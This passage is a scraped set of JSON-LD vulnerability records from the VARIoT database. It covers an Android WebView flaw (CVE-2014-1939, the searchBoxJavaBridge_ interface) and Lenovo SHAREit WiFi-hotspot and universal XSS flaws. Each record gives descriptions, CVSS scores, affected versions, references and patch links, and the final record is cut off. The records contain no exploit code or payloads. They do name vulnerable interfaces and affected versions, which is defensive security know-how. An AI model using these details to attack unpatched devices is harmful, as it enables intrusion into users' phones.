"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-90311"
},
{
"db": "BID",
"id": "81748"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001339"
},
{
"db": "PACKETSTORM",
"id": "135378"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-638"
},
{
"db": "NVD",
"id": "CVE-2016-1492"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-01-26T00:00:00",
"db": "VULHUB",
"id": "VHN-90311"
},
{
"date": "2016-01-25T00:00:00",
"db": "BID",
"id": "81748"
},
{
"date": "2016-01-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-001339"
},
{
"date": "2016-01-25T20:02:22",
"db": "PACKETSTORM",
"id": "135378"
},
{
"date": "2016-01-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201601-638"
},
{
"date": "2016-01-26T19:59:07.517000",
"db": "NVD",
"id": "CVE-2016-1492"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-09T00:00:00",
"db": "VULHUB",
"id": "VHN-90311"
},
{
"date": "2016-01-25T00:00:00",
"db": "BID",
"id": "81748"
},
{
"date": "2016-01-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-001339"
},
{
"date": "2016-01-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201601-638"
},
{
"date": "2025-04-12T10:46:40.837000",
"db": "NVD",
"id": "CVE-2016-1492"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "specific network environment",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201601-638"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Android Edition Lenovo SHAREit of WiFi Vulnerability to gain access rights at hotspots",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001339"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201601-638"
}
],
"trust": 0.6
}
}
VAR-201403-0224
Vulnerability from variot - Updated: 2025-04-13 23:18java/android/webkit/BrowserFrame.java in Android before 4.4 uses the addJavascriptInterface API in conjunction with creating an object of the SearchBoxImpl class, which allows attackers to execute arbitrary Java code by leveraging access to the searchBoxJavaBridge_ interface at certain Android API levels. Google Android Jelly Bean is prone to an unspecified security vulnerability. Little is known about this issue or its effects at this time. We will update this BID as more information emerges. Google Chrome is a web browser developed by Google (Google). Android is a Linux-based open source operating system jointly developed by Google and the Open Handheld Alliance (OHA). The vulnerability stems from the fact that the program uses the addJavascriptInterface API and creates an object of the SearchBoxImpl class
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201403-0224",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "android",
"scope": "eq",
"trust": 1.6,
"vendor": "google",
"version": "4.0"
},
{
"model": "android",
"scope": "eq",
"trust": 1.3,
"vendor": "google",
"version": "4.2.2"
},
{
"model": "android",
"scope": "eq",
"trust": 1.3,
"vendor": "google",
"version": "4.3"
},
{
"model": "android",
"scope": "eq",
"trust": 1.3,
"vendor": "google",
"version": "4.2"
},
{
"model": "android",
"scope": "eq",
"trust": 1.3,
"vendor": "google",
"version": "4.1"
},
{
"model": "android",
"scope": "eq",
"trust": 1.0,
"vendor": "google",
"version": "4.0.1"
},
{
"model": "android",
"scope": "lte",
"trust": 1.0,
"vendor": "google",
"version": "4.3.1"
},
{
"model": "android",
"scope": "eq",
"trust": 1.0,
"vendor": "google",
"version": "4.0.4"
},
{
"model": "android",
"scope": "eq",
"trust": 1.0,
"vendor": "google",
"version": "4.1.2"
},
{
"model": "android",
"scope": "eq",
"trust": 1.0,
"vendor": "google",
"version": "4.0.2"
},
{
"model": "shareit",
"scope": "lte",
"trust": 1.0,
"vendor": "lenovo",
"version": "3.5.88_ww"
},
{
"model": "android",
"scope": "eq",
"trust": 1.0,
"vendor": "google",
"version": "4.0.3"
},
{
"model": "android",
"scope": "eq",
"trust": 1.0,
"vendor": "google",
"version": "4.2.1"
},
{
"model": "android",
"scope": "lt",
"trust": 0.8,
"vendor": "google",
"version": "4.4"
},
{
"model": "android",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "4.3.1"
},
{
"model": "android",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "4.1.1"
}
],
"sources": [
{
"db": "BID",
"id": "65473"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001554"
},
{
"db": "CNNVD",
"id": "CNNVD-201403-037"
},
{
"db": "NVD",
"id": "CVE-2014-1939"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:google:android",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-001554"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Joshua J. Drak",
"sources": [
{
"db": "BID",
"id": "65473"
}
],
"trust": 0.3
},
"cve": "CVE-2014-1939",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2014-1939",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-69878",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2014-1939",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2014-1939",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-201403-037",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-69878",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2014-1939",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-69878"
},
{
"db": "VULMON",
"id": "CVE-2014-1939"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001554"
},
{
"db": "CNNVD",
"id": "CNNVD-201403-037"
},
{
"db": "NVD",
"id": "CVE-2014-1939"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "java/android/webkit/BrowserFrame.java in Android before 4.4 uses the addJavascriptInterface API in conjunction with creating an object of the SearchBoxImpl class, which allows attackers to execute arbitrary Java code by leveraging access to the searchBoxJavaBridge_ interface at certain Android API levels. Google Android Jelly Bean is prone to an unspecified security vulnerability. \nLittle is known about this issue or its effects at this time. We will update this BID as more information emerges. Google Chrome is a web browser developed by Google (Google). Android is a Linux-based open source operating system jointly developed by Google and the Open Handheld Alliance (OHA). The vulnerability stems from the fact that the program uses the addJavascriptInterface API and creates an object of the SearchBoxImpl class",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-1939"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001554"
},
{
"db": "BID",
"id": "65473"
},
{
"db": "VULHUB",
"id": "VHN-69878"
},
{
"db": "VULMON",
"id": "CVE-2014-1939"
}
],
"trust": 2.07
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-1939",
"trust": 2.9
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2014/02/11/2",
"trust": 2.6
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001554",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201403-037",
"trust": 0.7
},
{
"db": "MLIST",
"id": "[OSS-SECURITY] 20140210 CVE-2014-1939 SEARCHBOXJAVABRIDGE_ IN ANDROID JELLY BEAN",
"trust": 0.6
},
{
"db": "BID",
"id": "65473",
"trust": 0.5
},
{
"db": "VULHUB",
"id": "VHN-69878",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2014-1939",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-69878"
},
{
"db": "VULMON",
"id": "CVE-2014-1939"
},
{
"db": "BID",
"id": "65473"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001554"
},
{
"db": "CNNVD",
"id": "CNNVD-201403-037"
},
{
"db": "NVD",
"id": "CVE-2014-1939"
}
]
},
"id": "VAR-201403-0224",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-69878"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-13T23:18:55.176000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Introducing Chromium-powered Android WebView",
"trust": 0.8,
"url": "http://blog.chromium.org/2013/11/introducing-chromium-powered-android.html"
},
{
"title": "WebViewCompat",
"trust": 0.1,
"url": "https://github.com/BCsl/WebViewCompat "
},
{
"title": "Securelist",
"trust": 0.1,
"url": "https://securelist.com/results-of-poc-publishing/74724/"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2014-1939"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001554"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-94",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-69878"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001554"
},
{
"db": "NVD",
"id": "CVE-2014-1939"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "http://openwall.com/lists/oss-security/2014/02/11/2"
},
{
"trust": 1.8,
"url": "http://blog.chromium.org/2013/11/introducing-chromium-powered-android.html"
},
{
"trust": 1.2,
"url": "https://support.lenovo.com/us/en/product_security/len_6421"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-1939"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-1939"
},
{
"trust": 0.3,
"url": "http://code.google.com/android/"
},
{
"trust": 0.3,
"url": "http://seclists.org/oss-sec/2014/q1/311"
},
{
"trust": 0.3,
"url": "http://seclists.org/oss-sec/2014/q1/313"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/94.html"
},
{
"trust": 0.1,
"url": "https://www.securityfocus.com/bid/65473"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/bcsl/webviewcompat"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-69878"
},
{
"db": "VULMON",
"id": "CVE-2014-1939"
},
{
"db": "BID",
"id": "65473"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001554"
},
{
"db": "CNNVD",
"id": "CNNVD-201403-037"
},
{
"db": "NVD",
"id": "CVE-2014-1939"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-69878"
},
{
"db": "VULMON",
"id": "CVE-2014-1939"
},
{
"db": "BID",
"id": "65473"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001554"
},
{
"db": "CNNVD",
"id": "CNNVD-201403-037"
},
{
"db": "NVD",
"id": "CVE-2014-1939"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-03-03T00:00:00",
"db": "VULHUB",
"id": "VHN-69878"
},
{
"date": "2014-03-03T00:00:00",
"db": "VULMON",
"id": "CVE-2014-1939"
},
{
"date": "2014-02-10T00:00:00",
"db": "BID",
"id": "65473"
},
{
"date": "2014-03-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-001554"
},
{
"date": "2014-03-03T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201403-037"
},
{
"date": "2014-03-03T04:50:46.453000",
"db": "NVD",
"id": "CVE-2014-1939"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-05-26T00:00:00",
"db": "VULHUB",
"id": "VHN-69878"
},
{
"date": "2016-05-26T00:00:00",
"db": "VULMON",
"id": "CVE-2014-1939"
},
{
"date": "2014-02-10T00:00:00",
"db": "BID",
"id": "65473"
},
{
"date": "2014-03-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-001554"
},
{
"date": "2015-08-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201403-037"
},
{
"date": "2025-04-12T10:46:40.837000",
"db": "NVD",
"id": "CVE-2014-1939"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201403-037"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Android of java/android/webkit/BrowserFrame.java In any Java Code execution vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-001554"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "code injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201403-037"
}
],
"trust": 0.6
}
}
VAR-201605-0269
Vulnerability from variot - Updated: 2025-04-12 23:29Cross-site scripting (XSS) vulnerability in Lenovo SHAREit before 3.5.98_ww on Android before 4.4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS).". Lenovo ShareIT for Android is prone to a cross-site scripting vulnerability because they fail to sufficiently sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in an unsuspecting user's browser in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Lenovo SHAREit (Eggplant Express) on Android is a set of file sharing software based on the Android platform of China Lenovo (Lenovo)
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201605-0269",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "shareit",
"scope": "eq",
"trust": 1.0,
"vendor": "lenovo",
"version": "3.5.98_ww"
},
{
"model": "shareit",
"scope": "lt",
"trust": 0.8,
"vendor": "lenovo",
"version": "3.5.98_ww (android 4.4 )"
},
{
"model": "android",
"scope": "eq",
"trust": 0.6,
"vendor": "google",
"version": "4.3.1"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-002920"
},
{
"db": "CNNVD",
"id": "CNNVD-201605-585"
},
{
"db": "NVD",
"id": "CVE-2016-4783"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:lenovo:shareit",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-002920"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Nicky of Tencent Security Platform Department",
"sources": [
{
"db": "BID",
"id": "90833"
}
],
"trust": 0.3
},
"cve": "CVE-2016-4783",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2016-4783",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-93602",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"id": "CVE-2016-4783",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.8,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2016-4783",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2016-4783",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-201605-585",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-93602",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-93602"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002920"
},
{
"db": "CNNVD",
"id": "CNNVD-201605-585"
},
{
"db": "NVD",
"id": "CVE-2016-4783"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cross-site scripting (XSS) vulnerability in Lenovo SHAREit before 3.5.98_ww on Android before 4.4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka \"Universal XSS (UXSS).\". Lenovo ShareIT for Android is prone to a cross-site scripting vulnerability because they fail to sufficiently sanitize user-supplied input. \nAn attacker may leverage this issue to execute arbitrary script code in an unsuspecting user\u0027s browser in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Lenovo SHAREit (Eggplant Express) on Android is a set of file sharing software based on the Android platform of China Lenovo (Lenovo)",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-4783"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002920"
},
{
"db": "BID",
"id": "90833"
},
{
"db": "VULHUB",
"id": "VHN-93602"
}
],
"trust": 1.98
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-4783",
"trust": 2.8
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002920",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201605-585",
"trust": 0.7
},
{
"db": "BID",
"id": "90833",
"trust": 0.4
},
{
"db": "VULHUB",
"id": "VHN-93602",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-93602"
},
{
"db": "BID",
"id": "90833"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002920"
},
{
"db": "CNNVD",
"id": "CNNVD-201605-585"
},
{
"db": "NVD",
"id": "CVE-2016-4783"
}
]
},
"id": "VAR-201605-0269",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-93602"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-12T23:29:28.443000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "LEN-6421",
"trust": 0.8,
"url": "https://support.lenovo.com/jp/ja/product_security/len_6421"
},
{
"title": "Lenovo SHAREit Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=61898"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-002920"
},
{
"db": "CNNVD",
"id": "CNNVD-201605-585"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-93602"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002920"
},
{
"db": "NVD",
"id": "CVE-2016-4783"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "https://support.lenovo.com/us/en/product_security/len_6421"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-4783"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-4783"
},
{
"trust": 0.3,
"url": "http://shareit.lenovo.com/"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-93602"
},
{
"db": "BID",
"id": "90833"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002920"
},
{
"db": "CNNVD",
"id": "CNNVD-201605-585"
},
{
"db": "NVD",
"id": "CVE-2016-4783"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
